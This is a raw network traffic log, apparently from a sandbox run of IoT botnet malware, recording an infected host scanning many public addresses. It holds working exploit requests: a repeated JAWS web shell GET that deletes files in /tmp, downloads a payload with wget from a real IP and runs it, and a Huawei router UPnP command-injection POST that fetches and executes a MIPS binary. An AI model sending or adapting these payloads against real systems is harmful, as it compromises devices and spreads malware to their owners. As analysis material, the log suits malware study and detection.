                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;95331302&#46;1706279521&#46;691d027</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            310192.168.2.2346800222.109.127.9080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.846678972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:02.134089947 CET487INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:00 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            311192.168.2.235234035.74.9.15080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.875204086 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            312192.168.2.233716081.199.207.15480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:01.907068968 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:02.691056967 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.258966923 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            313192.168.2.2335116102.219.77.14880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:02.052413940 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:02.402678013 CET512INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 24 Jun 2022 22:25:49 GMT
                                                            Server: lighttpd/1.4.54
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            314192.168.2.2339758197.246.45.20137215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.352628946 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                            Jan 26, 2024 15:32:04.653212070 CET182INHTTP/1.1 500 Internal Server Error
                                                            Content-Type: text/xml; charset="utf-8"
                                                            Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                            EXT:
                                                            Connection: Keep-Alive
                                                            Content-Length: 398


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            315192.168.2.2351752167.82.74.11280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.521738052 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.624342918 CET167INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Length: 11
                                                            content-type: text/plain; charset=utf-8
                                                            x-served-by: cache-pdk-kfty2130050
                                                            Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                            Data Ascii: Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            316192.168.2.2359294138.4.254.15880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.618046045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            317192.168.2.2336892136.243.128.17380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.624562025 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.829969883 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            318192.168.2.2339674147.46.85.25580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.696624994 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.978614092 CET159INHTTP/1.0 302 Found
                                                            Location: http://127.0.0.1:80/003508235313/shell?cd+/tmp;rm+-rf+*;wget+
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            319192.168.2.2336660162.144.71.10480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.770716906 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:04.924664021 CET340INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:58 GMT
                                                            Server: Apache
                                                            Accept-Ranges: bytes
                                                            Cache-Control: max-age=86400
                                                            Content-Length: 130
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 77 68 69 74 65 3e 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 0a 49 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor=white><h1>400 Bad Request</h1>Invalid request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            320192.168.2.234233420.240.179.11180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.835959911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            321192.168.2.23528568.217.167.1980
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.936288118 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:05.438031912 CET294INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            322192.168.2.2341806196.205.27.22680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:04.941163063 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            323192.168.2.234149418.235.53.6080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:06.564301014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:06.680542946 CET349INHTTP/1.1 503 Service Temporarily Unavailable
                                                            Server: awselb/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:06 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            324192.168.2.2338456198.1.91.2580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:06.600509882 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:06.752892017 CET504INHTTP/1.1 301 Moved Permanently
                                                            Date: Fri, 26 Jan 2024 14:32:12 GMT
                                                            Server: Apache
                                                            Location: https:///400.shtml
                                                            Content-Length: 290
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 2f 34 30 30 2e 73 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 72 65 6d 6f 74 65 61 70 70 64 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https:///400.shtml">here</a>.</p><hr><address>Apache Server at remoteappd.com Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            325192.168.2.2332882168.188.96.23380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:06.737936974 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.618361950 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:09.410088062 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.025588989 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:20.192589045 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:34.526575089 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            326192.168.2.2345648187.192.184.22880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:06.859488010 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            327192.168.2.235035281.198.251.19780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:06.972423077 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:07.567786932 CET301INHTTP/1.1 200 OK
                                                            Content-Type:text/html
                                                            Pragma:no-cache
                                                            Cache-control:no-cache, no-store, max-age=0
                                                            Transfer-Encoding:chunked
                                                            X-Frame-Options:SAMEORIGIN
                                                            Connection:Keep-Alive
                                                            X-XSS-Protection:1; mode=block
                                                            Content-Security-Policy:default-src 'self' 'unsafe-inline' 'unsafe-eval'
                                                            Jan 26, 2024 15:32:07.581851959 CET1286INData Raw: 63 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33
                                                            Data Ascii: c20<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8
                                                            Jan 26, 2024 15:32:07.595344067 CET1286INData Raw: 3b 20 69 20 3c 20 4c 69 73 74 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 66 61 6c 73 65 20 3d 3d 20 49 73 49 50 76 36 41 64 64 72 65 73 73 55 73 68 6f 72 74 56 61 6c 69 64 28 4c 69 73 74 5b 69
                                                            Data Ascii: ; i < List.length; i++) { if (false == IsIPv6AddressUshortValid(List[i])) { return false; } } return true; }function IsIPv6AddressValid(Address){ if (Address == "::") {
                                                            Jan 26, 2024 15:32:07.602190971 CET580INData Raw: 3b 0a 7d 0a 65 6c 73 65 0a 7b 0a 76 61 72 20 6e 65 77 69 70 76 36 61 64 64 72 20 3d 20 48 6f 73 74 49 6e 66 6f 2e 73 75 62 73 74 72 28 30 2c 6c 61 73 74 69 6e 64 65 78 29 3b 0a 76 61 72 20 6e 65 77 69 70 76 36 70 6f 72 74 20 3d 20 48 6f 73 74 49
                                                            Data Ascii: ;}else{var newipv6addr = HostInfo.substr(0,lastindex);var newipv6port = HostInfo.substr(lastindex+1);if (IsMaintWan == 0){window.location="https://[" + newipv6addr + "]:" + SSLPort;}else{window.location="https://[" + newipv6addr +


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            328192.168.2.235877865.0.126.4680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:07.167335987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
